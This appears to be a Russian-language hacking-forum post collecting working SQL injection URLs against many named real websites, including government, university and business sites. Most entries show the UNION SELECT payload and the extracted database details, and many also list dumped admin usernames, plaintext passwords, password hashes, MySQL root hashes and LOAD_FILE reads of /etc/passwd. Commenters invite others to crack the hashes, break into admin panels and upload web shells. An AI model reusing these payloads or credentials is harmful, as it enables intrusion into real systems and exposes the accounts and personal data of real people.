http://www.southwalesforktrucks.co.uk/display.php?id=124/**/UNION/**/SELECT/**/1,2,3,concat(user(),0x3a,version(),0x3a,database() ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23/**/LIMIT/**/1,1/*


forked@tom.xcalibre.co.uk:4.0.24-standard-log:sw

http://modemtur.ru/index.php?act=news&id=-1+union+select+1,2,3,4--

Database Version: 4.1.22
Database name: wwwmodemturru_modemtur
User name: modemtur_modem01@fix.hc.ru

-----------------------------------------------------------------------------------------------------------

http://ns.dosimetr.ru/?page=news&id=-1+union+select+1,2,3,4,5,6,7,8--

Database Version: 4.1.14-nt
Database name: betatest
User name: root@localhost

Login: root
Pass: rrtt

easy.finereader.ru

http://easy.finereader.ru/works/?id=-16+union+select+concat(user(),0x3a,database(),0x3a ,version()),2,3,4,5--

user(): easy-finereader@localhost
database(): easy-finereader
version(): 4.1.22-log

PR=3

table user

http://easy.finereader.ru/works/?id=-16+union+select+concat(user_id,0x3a,user_login,0x3 a,user_pass),2,3,4,5+from+user--

5:thistle:thistle
6:pablo2008:ybSsbp5cT
7:skotch:NKTeSuQ2z
8:simam:STg4xpTPq
9:Yarik:gCQzggkCp
10:Olegator:9FQBdB8Hk

Pagerank: 4
тИЦ: 375

http://www.gm-avtovaz.ru/new_ru/inside.php?pointer=-1+union+select+concat_ws(0x3a,version(),database() ,u ser()),2,3,4,5,6,7,8,9,10--&page=informDetal

Database Version : 5.0.67
Database name : gmavtovazru_gm
User name : gm-avtovazru@78.108.81.21

http://www.gm-avtovaz.ru/new_ru/inside.php?pointer=-311+union+select+concat_ws(0x3a3a,name,password),2 ,3,4,5,6,7,8,9,10+fr om+gmavtovazru.auth--&page=informDetal

gm-avtovazru:G15m26A11v23

thx 2 farex and AkyHa_MaTaTa ;)

http://www.rof.ro/index.php?page=-21+union+select+concat_ws(0x3a,version(),database( ),user()),2



Database Version: 4.1.20-community-nt
Database name: rof
User name: rof@74.52.114.250

http://www.cdrm.ru/school/?action=news&id=-5+union+select+1,2,3,4,5,6--

Database Version: 4.1.21
Database name: cdrmdevel
User name: cdrmdevel@localhost

--------------------------------------------------------------------------------------------------------------

http://forum.west-net.ru/index.php?site=news&id=-1+union+select+1,2.3--

Database Version: 5.0.77
Database name: sms
User name: casker35@localhost

Login: seoadmin
Pass: sk09top10zx

http://www.natja.org/ewire/display.php?id=472/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,AES_D ECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A62656769 6E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User (),0x7873716C696E6A656E64),0x71),0x71),20,21,22,23/**/LIMIT/**/1,1/*

Database Version: 5.0.45
Database name: NATJA
User name: natjaweb@localhost

Admin:eastwest:e5b383add2bb24336e93ff8da082951f:pe ter@apolloi.com

http://www.monitoruldegalati.ro/index.php?func=articol&domeniu=Eveniment&articol=-4+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11--


Version : 5.0.67-community
Database : monitord_monitorul
User : monitord_monitor@localhost

http://www.rtconveer.ru/production/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6--&pr=_9

Database Version : 4.0.12-nt
Database name : rt_conveyor_new
User name : root@localhost

админ :

http://www.rtconveer.ru/production/index.php?id=-1+union+select+1,2,3,concat(user,0x3a,password,0x3 a,file_priv),5,6+from+mysql .user--&pr=_9

root:671100b84af6d5a7

file_priv Y

http://www.elpais.com.co/php/opinion/ampliar_opinion.php?id_opinion=-623551+union+select+1,user,3,4,5,6,7,8,9,10,11,12, 13,14+from+mysql.user
elpais:1cbbcde00d879eae

http://www.suzdalfest.ru/index.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11--

Database Version : 4.1.22
Database name : db_masterfilm_4
User name : dbu_masterfilm_1@192.168.9.94

-----------------------------------------------------------------------------------------------------------------

http://www.jazzpoll.com.ua/index.php?id=-3+union+select+1,2,3,4,5,6,7--

Database Version : 5.0.51a
Database name : jazzpoll
User name : jazzpoll@localhost
--
Админ:

Login: ivan
Pass: 2009pass

http://www.jazzpoll.com.ua/login.php/

https://breakwaterschool.org/cc.php?s=7&id=-57+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25
5.0.77-log

http://gogetitcredit.com/cc.php?id=-5+union+select+1,version(),3,4,5,6,7,8
5.0.51a

http://www.beijing-08.info/co.php?cat=bag_bag&page=&id=-21061+union+select+version(),2,3,4,5,6,7,8,9,10
5.0.32-Debian_7etch6-log
olli@localhost:*9D1F6B5862EB12ACFDC64B218DFA08CA38 FE1F62

http://borets-compressor.ru/special.php?newsid=-1+union+select+1,2,3,4,concat_ws(0x3a,ver sion(),database(),user()),6,7,8,9--

Database Version : 4.1.22-log
Database name : wwwtkboretsru_boretsco
User name : tkborets_boret01@localhost

админ :

http://borets-compressor.ru/special.php?newsid=-1+union+select+1,2,3,4,concat_ws(0x3a,us ername,password),6,7,8,9+from+admin--

vasiliy:2cc5ac173a4098b8

http://revistaramuri.ro/index.php?id=-667+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7&editie=31&autor=



Version : 5.0.45-5-log
Database : printmaster
User : printmaster@ns03.digicom.ro

http://revistaramuri.ro/index.php?id=-667+union+select+1,2,3,concat_ws(0x3a,id,email,pas sword,nume),5,6,7+from+printmaster.admusers+limit+ 0,1/*&editie=31&autor=

1:admin:bibani4321

http://revistaramuri.ro/adm/

www.sanvek.ru
site - http://www.sanvek.ru
http://www.sanvek.ru/index.php?id=20&idm=-344+union+select+1,2,3,4,concat_ws(0x3a,name,login ,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26+from+wm_users--
database : 5.0.75-log
database_name : sanmebo9_info
table : wm_users
name : Administrator
login : admin
password : partenit
active : Y

http://www.sonistics.com/smer_update_ind.php?id=44437676657809+union+select +1,2,concat_ws(0x3a,version(),user(),database())--

Version:5.0.67-community
User: sonistic_db@localhost
Database: sonistic_db


http://www.aandmbaits.com/products.php?id=-53+union+select+1,concat_ws(0x3a,version(),user(), database()),3--&cat=WORM+WEIGHTS

Database Version:4.1.22-standard
User name: baits_clerk@localhost
Database name: baits_shop


http://www.bangz.net/staff_detail.php?id=1809865345+union+select+1,2,3, 4,concat_ws(0x3a,version(),user(),database()),6,7, 8,9--


Database Version:4.1.22-log
User name: bangzuser@localhost
Database name: bangz_data



http://www.e-unions.org/russian/people.php?id=17987553888092+UNION+SELECT+1,AES_DE CRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Datab ase(),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31--


Database Version: 4.1.15-Debian_1
Database name: uks38623
User name: uks38623@localhost


http://www.redballoon.co.za/crafter.php?id=13655579872+union+select+1,2,3,4,co ncat_ws(0x3a,version(),user(),database()),6,7,8,9, 10,11,12,13,14,15,16,17,18,19--&name=The%20Gift%20Connexion

5.0.67-community
redba5_redballoo@localhost
redba5_redballoon


http://noemio.org/shop3.php?num=1798754332+union+select+1,2,3,concat _ws(0x3a,version(),user(),database()),5,6,7,8,9,10 ,11,12--



Version:5.0.67-community
User:noemioc@localhost
Database:noemioc_org



http://www.rockcontest.it/home.php/home.php?id=68764322774+union+select+1,2,3,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71),5,6,7--


Version: 4.1.10
Database: rockcontest_it_anno2004
User: rockcontestread@localhost



http://www.missemistersardegna.it/partecipanti/scheda.php?id=20809861/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(CO NCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x 3a),0x71),0x71),13,14--



Version:4.0.27-standard-log
Database: Sql74096_2
User: Sql74096@62.149.131.61


http://sisinflab.poliba.it/index.php?page=projects&id=687696704+union+select+1,2,AES_DECRYPT(AES_ENCR YPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,Use r(),0x3a),0x71),0x71),4,5,6,7,8,9,10,11--


Version: 4.1.16
Database: snews
User: sisinfpub@localhost



http://www.bandb-toscana.it/strutture_en.php?tipo=provincia&id=798709894698+union+select+1,concat_ws(0x3a,vers ion(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25--


Version: 5.0.68-log
User: Sql112896@62.149.141.58
Database:Sql112896_1



http://www.bestbond.co.za/read_article.php?id=1379875542+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6--


Version: 4.1.21
User: bestbond@localhost
Database: bestbond



http://www.tiffreviews.com/2005/film.php?id=-202+union+select+concat_ws(0x3a,version(),user(),d atabase())--


5.0.67-community-log
dystopia_tiffdb@localhost
dystopia_tiffreviews



http://www.swedishpunk.com/bands.php?id=140+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3--



5.0.32-Debian_7etch8-log
swedishpunk_com@srv17.one.com
swedishpunk_com

http://www.gbconvention.org/testimony.php?id=-12+union+select+1,2,3,4,5,6--


Version: 5.0.41-community-log
Database: cosmole_gbc
User: cosmole_gbc@98.130.0.130


http://www.legacyandlegacy.com/conferences/details.php?id=-13+union+select+1,2,3,4,5,6,7,8,9--


Version: 4.1.22-standard-log
Database: 347027_legacycms
User: 347027_alfred@172.16.11.187


http://www.awatuhomes.com/news/index.php?id=-00000000016+union+select+1,2,3,4,5,6,7--


Version: 4.1.22-standard-log
Database: 335037_awatucms
User: 335037_alfred@172.16.10.101

http://www.eastcoast-estates.com/search/detail.php?id=3555443437798798+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a,version(),user(),database ()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--


Version: 5.0.51a-log
User: eastcoas_search@boscgi0404.eigbox.net
Database: eastcoas_realestate




http://www.internationaltradingcompany.info/it/s3_det.php?id=479879865433+union+select+1,2,3,4,5, 6,7,8,9,10,11,concat_ws(0x3a,version(),user(),data base()),13,14,15,16,17,18,19--


Database Version: 5.0.32-Debian_7etch1-log
Database name: intertrading_info
User name: webuser@localhost


http://www.internationaltradingcompany.info/it/s3_det.php?id=479879865433+union+select+1,2,3,4,5, 6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14, 15,16,17,18,19+from+mysql.user--



root : *8CC6D25FFB418EAC1093163C2DB24D644B9DE76F
debian-sys-maint : *A7BB7A135E9236B6861F1F7C22C28027D012C90F
webuser : *2E1319087233E5A3642345C6A55510DAE990B002


Читаем etc/passwd

http://www.internationaltradingcompany.info/it/s3_det.php?id=479879865433+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,CONCAT(0x3a,LOAD_FILE(0x2F6574632F70 6173737764),0x3a),13,14,15,16,17,18,19--

http://globalfsconsulting.info/display.php?page=-105+union+select+1,2,3,4,5,6,7,8,9,0/*

Database Version: 4.1.22-log
Database name: gfsc_db
User name: gfsc_dbman@localhost

http://www.wpc.gov.lk/wpc-planning/memberdetails.php?RID=54623875603+union+select+1,A ES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a, Database(),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7 ,8,9,10--


Database Version: 5.0.4-beta-nt
Database name: dbwpcplanning
User name: root@localhost



http://www.wpc.gov.lk/wpc-planning/memberdetails.php?RID=54623875603+union+select+1,A ES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,password,0x3a,U ser,0x3a),0x71),0x71),3,4,5,6,7,8,9,10+from+mysql. user--


*35A07C27A4C9E7065E275041F949FE07D5347D48 : root

http://ombu.primorsky.ru/articles.php?id=-224+union+select+1,2,concat_ws(0x3a,version(),data base(),users()),4,5,6,7--

database : 4.1.22-log
name_database : ombu
user :ombu@localhost

ASP + MYSQL

http://www.elcaandy.org/archivearticle.asp?id=28098097544+union+select+1,2 ,concat_ws(0x3a,version(),user(),database()),4,5,6 ,7,8,9--

Version: 4.0.24-nt-max
User: internetadmin@DEDI408
Database: standrew

http://www.chefgarvin.com/home.php?module=news&id=-1+union+select+1,concat_ws(0x3a,password,username) ,3,4,5+from+users--

Version: 5.0.67-log
User: chefgarvin@coke.dreamhost.com
Database: chefgarvin

Админка:

http://www.chefgarvin.com/admin/
Login: Charles
Pass: test

Ток не заходит в админку, хз чего

Перчики дизайнерские -)

http://www.plethoradesign.com/portfolio/view.php?id=37987987986454435/**/uNiOn/**/sElECt/**/1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--


Database Version: 5.0.67-community
Database name: plethora_projects
User name: plethora_work@localhost

http://www.contabilul.ro/index.php?pag=a&id=&s=&aid=-2317+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,9,10/*


Database Version: 5.0.26
Database name: contabilul
User name: root@localhost

http://www.contabilul.ro/index.php?pag=a&id=&s=&aid=-2317+union+select+1,2,3,4,5,load_file('/etc/passwd'),7,8,9,10/*

PR 5
http://www.wccs.edu/

http://www.wccs.edu/news/article.php?nid=-169+union+select+1,2,concat_ws(0x3a,user,Password) ,4,5,6,7,8+from+mysql.user--
root:*5AA32F1068AC50393758B94305EBA8978DFE3448

http://www.audio-architects.net/news.php?module=news&id=-1+union+select+1,2--

Database Version: 4.1.20
Database name: audioarc
User name: audioarc@localhost


http://www.cpspei.ca/news?page=news&id=-1+union+select+1,2,unhex(hex(version())),4,5--

Database Version: 4.1.14-standard
Database name: cpspei_ca_-_cofp
User name: cpspei@localhost


http://nkc-inter.com/?v=news&id=-1+union+select+1,2,3,4,5,6--

Database Version: 4.1.22-standard-log
Database name: nkcinter_sitemagixprod
User name: nkcinter_nkcluye@localhost


http://www.locksafe.com.au/pages.php?action=news&id=-1+union+select+1,2,3,4,5,6,7,8--

Database Version: 4.1.22-log
Database name: locksafe
User name: locksafe@mysql.web.westnet.com.au


http://www.lared.com.gt/detalle_noticia.php?id=-3019+union+select+1,2,3,4,5--

Database Version: 4.1.25-Debian_mt1-log
Database name: db7589_rcn
User name: estudiodinamo@10.1.129.13


http://www.avancso.org.gt/index_noticias.php?id=-269+union+select+1,2,3,4,5,6,7,8,9,10--

Database Version: 4.0.26
Database name: avancso_org_gt
User name: avancso@localhost

----------------------------------------------------------------------------------------------------

http://www.yazdtile.com/user/news.php?action=news&id=-1+union+select+1,2,3,4--

Database Version: 5.0.67-community
Database name: yazdtile_tile
User name: yazdtile_mahtab@localhost

Login: admin
Pass: e10adc3949ba59abbe56e057f20f883e: 123456



http://www.shf.be/index.php?page=news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

Database Version: 4.1.20-log
[B]Database name: shf_public
User name: root@localhost

Login: root
Pass: 055990f63dab6a1b: ??

FILE_PRIV: Y


http://www.duatv.net/?req=news&id=-1+union+select+1,2,3--

Database Version: 5.0.67-community
[B]Database name: duatv_duatv
User name: duatv_ntduatv@localhost

Login: admin
Pass: 21232f297a57a5a743894a0e4a801fc3: admin

ТИЦ: 50
PR: 3

database(): germes_site
user(): germes_site@localhost
version(): 5.0.75

TARGET: http://www.germesavto.com

INJECTION: http://www.germesavto.com/new.php?id=-3+UnIon+Select+1,2,concat_ws(0x2e,table_schema,tab le_name),4+from+information_schema.tables+limit+17 ,1--

Админка: http://www.germesavto.com/login.php


Структура БД:

germes_site
-admins (2)
--login
--pwd
-files
-news
-ourcli
-strings
-strings2
-strings3
-texts

В табице admins 1 единственная запись:
admin:e101b2fe8c5dab5ca568675de0d2cb39 // ???

Хэш ХЗ. Кому интересно можно до конца добить)) Наверняка можно из админки залить шелл и вперед))

Вот еще одна... тока раскручивать ее лень. Кому надо, тот доделает. Делов на 15 мин))

http://rvkstovo.com/foto_gal.php?cat_id=-3+UnIoN+seleCt+table_name,2+from+information_schem a.tables+limit+17,1--

вот админка: http://rvkstovo.com/admin/login.php

http://www.audio-architects.net/news.php?module=news&id=-1+union+select+1,2--

Database Version: 4.1.20
Database name: audioarc
User name: audioarc@localhost


http://www.cpspei.ca/news?page=news&id=-1+union+select+1,2,unhex(hex(version())),4,5--

Database Version: 4.1.14-standard
Database name: cpspei_ca_-_cofp
User name: cpspei@localhost

http://pecom.ru/ru/news/index.php?id=2671+union+select+1,2,concat_ws(0x3a, version(),database(),user()),4,5,6,7,8,9,0-

database : 5.0.45
name database : pecomru
user : pecomru@localhost

admin1: admin
Root : okxfyfrs
Admin : cc07f226b4a09bed098607093a2db221 :(

http://www.pecom.ru/phpmyadmin/

http://www.kea.kz/readSeminar.php?did=147+and+0+union+select+1,versi on(),3,4,5,6,7,8,9,10--

http://www.tks.ch21.ru/zapchast/categ.php?id=1010&idcat=10&idc=9+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F, Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E6 4),0x71),0x71),3--



Database Version: 4.1.22-log
Database name: ch21ru63_tks
User name: ch21ru63@localhost

http://www.shuangliu.gov.cn/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--
admin:addc316ef700c787aafe451a0a1192ba:826901

интересные таблички:
user
cms_admin
cms_chatuser
cms_jwuser
cms_liveuser

http://www.aviso.ci/articleid.php?id=-69093+union+select+1,2,3,4,5,6,7,8,9,10--

version: 5.0.32-Debian_7etch8-log
database: avisonewdb
user: mnweb@localhost

User: root
Pass: FC470C8E58F926C8A5A5E3C18120FCB57040A2D4: topsyturvy

FILE_PRIV: Y

http://www.tractorsales.ru/index.php?mod=1&parent_id=303678404&t_id=-1

god_login:questor
adm_pass:21232f297a57a5a743894a0e4a801fc3
god_pass:21232f297a57a5a743894a0e4a801fc3

Если найдёте хэш...напишите в ЛС плиз(интересно)

http://www.ngo-monitor.org/articles.php?cat_id=17+UNION+SELECT+1,2,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(S ELECT+CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TAB LE_SCHEMA,0x7873716C696E6A64656C,TABLE_ROWS)+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+20,1),0x7873716C69 6E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34--


Database Version: 4.1.21-log
Database name: ngomonitor-1
User name: ngomonitor-1@localhost

http://frozenbass.ru/content.php?id=541+AND+ascii(substring(version(),1 ,1))=53--
version() = 5.*

http://frozenbass.ru/content.php?id=541+AND+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1,1), 1,1))=67--
*кому не скучно - подбирайте дальше))

http://www.casatineretului.ro/index.php?news=-354+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8




Database Version: 5.0.58-log
Database name: casatineretului_db
User name: casatineretuluiu@localhost

http://minzdrav.saratov.gov.ru/Institutions.php?mid=&id=620+union+select+1,concat(version(),database(), 0x3a,user()),3,4,5,6,7,8/*

version() 5.0.27
database() minzdrav
user() minzdrav@freya.sgu.ru

http://minzdrav.saratov.gov.ru/Institutions.php?mid=&id=620+union+select+1,concat(table_name,0x3a,colum n_name),3,4,5,6,7,8+from+information_schema.column s/*

http://minzdrav.saratov.gov.ru/Institutions.php?mid=&id=620+union+select+1,concat(user_name,0x3a,user_p assword,0x3a,user_mail),3,4,5,6,7,8+from+admin_use rs/*

Администратор:986ae29fac8cd4578a8ebe1 66eda05c6:123@123.123

press:25f9e794323b453885f5181f1b624d0b:RadinaOV@sa ratov.gov.ru

Макс:c4ca4238a0b923820dcc509a6f75849b:123
_____

http://www.maineservicecommission.gov/news/release.php?nID=1289+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20+limit+1,1/*

version() 4.1.22
databse() mccs_pcm
user() d43d4lus@localhost
___
http://www.colerainebc.gov.uk/news/event_item.php?nid=3238+union+select+1,2,3,4,5,6,7 ,8,9,10,11+from+mysql.user+limit+1,1/*

http://www.colerainebc.gov.uk/news/event_item.php?nid=3238+union+select+1,concat(user ,0x3a,password),3,4,5,6,7,8,9,10,11+from+mysql.use r+limit+1,1/*

root:4e2af55f0f094ddc
____
http://sonoivu.hanoi.gov.vn/news_print.php?nid=163+union+select+1,concat(versi on(),0x3a,database(),0x3a,user()),3,4,5,6,7,8+limi t+1,1

version() 5.0.51a-community-nt
database() sonoivu
user() sonoivu@localhost

http://sonoivu.hanoi.gov.vn/news_print.php?nid=163+union+select+1,concat(user, 0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1 ,1

root:*BB163059370C00C75F2DE2AB6719A12FD985AA2E

http://www.fotoclubbing.ro/detalii_afis.php?id=-717+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user())



Database Version: 4.0.27-standard
Database name: fotoclub_fotoclub
User name: fotoclub_foto@localhost

http://www.tonar.info/prod/dumper.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,vers ion(),database(),user()),13,14,15,16,17,18--

Database Version : 4.1.22-log
Database name : tonar
User name : tonar-sql@localhost

юзвери :

http://www.tonar.info/prod/dumper.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,username,pas sword),13,14,15,16,17,18+from+users--

http://www.uvm.edu/~sgaclubs/club_detail.php?CID=31+union+select+1,concat_ws(0x 3a,username,password),3,4,5,6,7,8+from+SGA_ADMIN+w here+ID=1--
admin:1692e00a7c8826a55a0a21d695b6bdfe (silvers)

adminka
https://www.uvm.edu/~sgaclubs/admin/

Правда не входит ((

http://www.cemt.ro/display.php?id=30/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*

Database Version: 4.1.22-max-log
Database name: cemt
User name: cemt@10.16.0.21

http://www.newallies.ro/display.php?id=-12/**/UNION/**/SELECT/**/1,2,3/**//*
Database Version: 4.1.22-max-log
Database name: newallies
User name: newallies@10.16.0.41

http://ccd.eduhr.ro/display.php?id=128+union+select+1,concat(user,0x3a ,password)+from+mysql.user+limit+1,1/*

root:18e5216c5a99ef9a

Database Version: 4.1.20
Database name: ccd
User name: ccd@localhost

http://www.man.gov.np/newsdetails.php?nid=35+union+select+1,2,concat(ver sion(),0x3a,database(),0x3a,user())+limit+1,1/*

version(): 4.1.22-standard
database(): mountain_mountain
user(): mountain_mountai@localhost
____

http://www.bangladeshtourism.gov.bd/news_detail.php?nid=3+union+select+1,concat(versio n(),0x3a,database(),0x3a,user()),3,4,5

version():5.0.67-community
database():bglade_mms
user():bglade_mms@localhost

http://shop.completdesign.com/detalii.php?id=-17+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6,7,8,9,10



Database Version: 5.0.67-community-log
Database name: completd_shop
User name: completd_sorin@localhost

http://www.autofirm.ru/news/index.php?&news_id=999999999+union+select+1,2,3,4,5,6,concat_ ws(0x3a,version(),database( ),user()),8,9,10,11,12--&action=news

Database Version : 4.1.22-log
Database name : :wiru
User name : wiru@localhost

Хотел спокойно послушать одну песенку на ютюбе, но был обескуражен наглым сообщением:

Это видео более недоступно из-за заявления о нарушении авторских прав, полученного от COOKING VINYL

Совсем охренели :\

http://www.cookingvinyl.com/release_info.php?id=-14+union+select+1,2,3,4,5,6,7,8,concat_ws(0x2F,use rname,password,email),1,1,1,1,1,1+from+users/*

admin/da6b9dce75dd25debe6b42e3cfd78657/gabriela@getadesigner.net

ElteRUS
это кто еще охринел))))

ncsu.edu
http://www.alumni.ncsu.edu/gallery/view.php?catid=-31'+union+select+1,concat_ws(0x3a,version()),3+fro m+admins/*

byuh.edu
http://w2.byuh.edu/devotionals/index.php?CatID=-20+union+select+unhex(hex(version()))/*

http://www.upk1.ru/index.php?spo2_id=-95+union+select+concat_ ws(0x3a,version(),database(),user()),2--

Database Version : 5.0.67-log
Database name : computer_upk1
User name : computer_upk1@localhost

http://www.inme.ru/viewtext.php?id=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--


Database Version: 5.0.67-LOG
Database name: U19285
User name: U19285@10.10.153.185


http://www.mirvokrug.com/piter/pano.php?id=-10+union+select+1,2,3,4--


Database Version: 5.0.67-percona-b5-log
Database name: hotel3d
User name: hotel3d@localhost

http://www.macmurph.com/photodb/picture.php?picture_id=-6+union+select+1,2,3,concat(version(),0x3a,user(), 0x3a,database()),5,6,7,8,9,10/*

Database Version: 4.1.22-max-log
Database name: MacMurph
User name: MacMurph@68.178.254.29

http://www.beatsdigital.com/index.php?track_id=1+union+select+concat(user,0x3a ,password)+from+mysql.user

Database Version: 5.0.77
Database name: beats_digital
User name: cms_internal@localhost

http://www.submityourarticle.com/syndicate/synd_author.php?w_id=0+union+select+1,concat(usern ame,0x3a,password),3+from+admin/*

Database Version: 5.0.45-log
Database name: submit
User name: submit@localhost

http://www.pubdistrict.com/gallery_view.php?e_id=-14+union+select+1,concat(member_username,0x3a,memb er_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21+from+members--

Database Version: 5.0.67-community
Database name: pubdistr_db
User name: pubdistr_user@localhost


http://www.gamingillustrated.com/review.php?review_id=0+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,concat(version(),0x3a, user(),0x3a,database()),19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*&subcat_id=1

Database Version: 5.0.27-community-nt
Database name: reviews
User name: webgi@localhost

http://www.hornady.com/display.php?t=22+union+select+1,2,3,4,55,6,7,8,9,0 ,1/*

Database Version: 4.0.27
Database name: hornady
User name: hornady@localhost

http://www.hornady.com/admin --------- админка

есть таблица users:email,name,password

[1]:dbennett@bensoft.com:Admin:interLock
[2]:ghanson@hornady.com:Greg Hanson:djkcmb
[3]:james@ideabankmarketing.com:James Ehly:ehlydesign
[4]:sherma@ideabankmarketing.com:sherma jones:makayla1989
[5]:duane@ideabankmarketing.com:Duane Norris:interLock
[6]:julie@ideabankmarketing.com:Julie Fahrlander:sheba
[7]:rwaltemath@hornady.com:Renae Waltemath:hotrod
[8]:anthony@ideabankmarketing.com:Anthony May:anthony
[9]:matt@ideabankmarketing.com:Matt Hodtwalker:ideabank07

хто зайдеть отпишите в личку, первые 2 usera попробавал нифига

site : http://www.l-oko.ru

http://www.l-oko.ru/article.php?id=-673'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,v ersion(),database(),user()),10,11,12--+

database : 5.1.30
name database : pashockz_lokonew
user : pashockz_lokonew@localhost

table_name : phpbb_users
users:

1)pashockz::133285ad47ca57fec643188e5375843b -/-/:(
2)Wel::4b2cf057b0ea7e5b81ad73f4b3ac8196 -/-/-/:(
3)tanya:cnhfyyfz :)
4)nebel::72c56fc02d124f8bd4d635c179ad62f7-/-/-:(
5)truth addict::55e3f0fd4a74c993864f1147e9e4edc7-/-/-/:(
+limit+1,1--+

www.sierravistamall.com

http://www.sierravistamall.com/~sierravi/news.php?ax=v&n=1&id=18&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version:user:database
4.1.22-standard-log:sierravi_admin@localhost:sierravi_cms

Юридическая фирма «Правозахист Украина», г. Донецк
http://www.pravozahyst.com/news_read.php?id=-19+union+select+1,2,3,concat(version(),0x3a,databa se(),0x3a,user())--

user(): pravozah_main
database(): pravozah_user@localhost
version(): 5.0.51a-community-log

Блин извините за баянский сайт www.dswd.gov.ph.....Поспешил черт....


http://www.unionevents.com/events/details.php?id=128098654389+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,AES_DECRYPT(AES_E NCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a, User(),0x3a),0x71),0x71),19,20,21,22,23,24,25,26,2 7,28,29,30--

Version: 4.1.16-standard-log
Database: unionevents
User: union_user@pizarro.dreamhost.com




Магазин Чипсеты итд....

http://www.ghielectronics.com/product/7987091180983+union+select+1,2,concat_ws(0x3a,vers ion(),user(),database())--

Database Version: 5.0.67-community-log
Database name: ghielect_main
User name: ghielect_user@localhost

http://www.canineconnection.info/index.php?id=-56+union+select+version(),2,3,4,5,6--
{вывод в title}
Database Version: 5.0.67-community
Database name: canine_content
User name: canine_connectio@localhost

http://www.canineconnection.info/admin
admin:canine

http://www.globaldance.info/shownews.php?news=-2857+union+select+1,2,3,4,5,6,7,8,9--

Database Version: 4.1.22-standard
Database name: dlobaldanc_db01
User name: dlobaldanc_db01@213.186.117.118

http://www.nasnegu.ru/index.php?s=3&m=62+union+select+1,2--

Database Version: 5.0.67
Database name: grandtour
User name: grandtour@194.87.13.136

http://autostate.ru/warehouse/viewmoscow.php?au=1&id=-1487+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1--

Database Version: 4.1.16
Database name: autosta2_warehouse
User name: autosta2_sql@localhost

http://www.thisweekinpalestine.com/details.php?id=268760980341+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_w s(0x3a,version(),user(),database())--&ed=148&edid=148


Version: 5.0.45
User: thisweek_twip2@localhost
Database: thisweek_twip2



